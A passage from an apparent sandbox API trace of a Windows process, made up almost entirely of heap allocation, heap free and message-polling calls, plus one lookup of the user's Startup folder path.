(in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.779] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.780] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0203.780] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.780] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0203.780] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.780] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0203.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0203.781] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.781] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0203.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.782] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.782] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0203.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0203.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b5fa8 | out: hHeap=0x12c0000) returned 1 [0203.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0203.783] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.783] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0203.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff208 | out: hHeap=0x12c0000) returned 1 [0203.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.784] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.784] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0203.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0203.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0203.785] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.785] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0203.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0203.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0203.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0203.786] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.786] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b5fa8 | out: hHeap=0x12c0000) returned 1 [0203.786] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x7df2d8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0203.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65f0 [0203.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0203.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66b0 [0203.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0203.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6668 [0203.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6668 | out: hHeap=0x12c0000) returned 1 [0203.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6608 [0203.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6608 | out: hHeap=0x12c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0203.789] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.789] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff5f0 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6758 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6758 | out: hHeap=0x12c0000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302680 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65c0 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6500 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6500 | out: hHeap=0x12c0000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0203.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0203.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0203.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0203.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0203.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0203.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0203.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0203.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0203.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0203.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0203.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0203.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: 